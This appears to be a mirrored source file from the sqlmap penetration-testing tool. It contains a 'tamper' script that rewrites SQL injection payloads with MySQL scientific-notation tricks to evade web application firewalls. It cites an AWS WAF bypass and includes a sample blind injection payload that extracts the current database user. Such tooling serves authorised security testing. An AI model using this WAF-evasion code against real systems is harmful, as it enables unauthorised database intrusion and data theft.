mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-28 04:23:50 +03:00
36 lines
985 B
Python
36 lines
985 B
Python
|
#!/usr/bin/env python
|
||
|
|
||
|
"""
|
||
|
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||
|
See the file 'LICENSE' for copying permission
|
||
|
"""
|
||
|
|
||
|
import re
|
||
|
|
||
|
from lib.core.enums import PRIORITY
|
||
|
|
||
|
__priority__ = PRIORITY.HIGHEST
|
||
|
|
||
|
def dependencies():
|
||
|
pass
|
||
|
|
||
|
def tamper(payload, **kwargs):
|
||
|
"""
|
||
|
Abuses MySQL scientific notation
|
||
|
|
||
|
Requirement:
|
||
|
* MySQL
|
||
|
|
||
|
Notes:
|
||
|
* Reference: https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/
|
||
|
|
||
|
>>> tamper('1 AND ORD(MID((CURRENT_USER()),7,1))>1')
|
||
|
'1 AND ORD 1.e(MID((CURRENT_USER 1.e( 1.e) 1.e) 1.e,7 1.e,1 1.e) 1.e)>1'
|
||
|
"""
|
||
|
|
||
|
if payload:
|
||
|
payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload)
|
||
|
payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure
|
||
|
|
||
|
return payload
|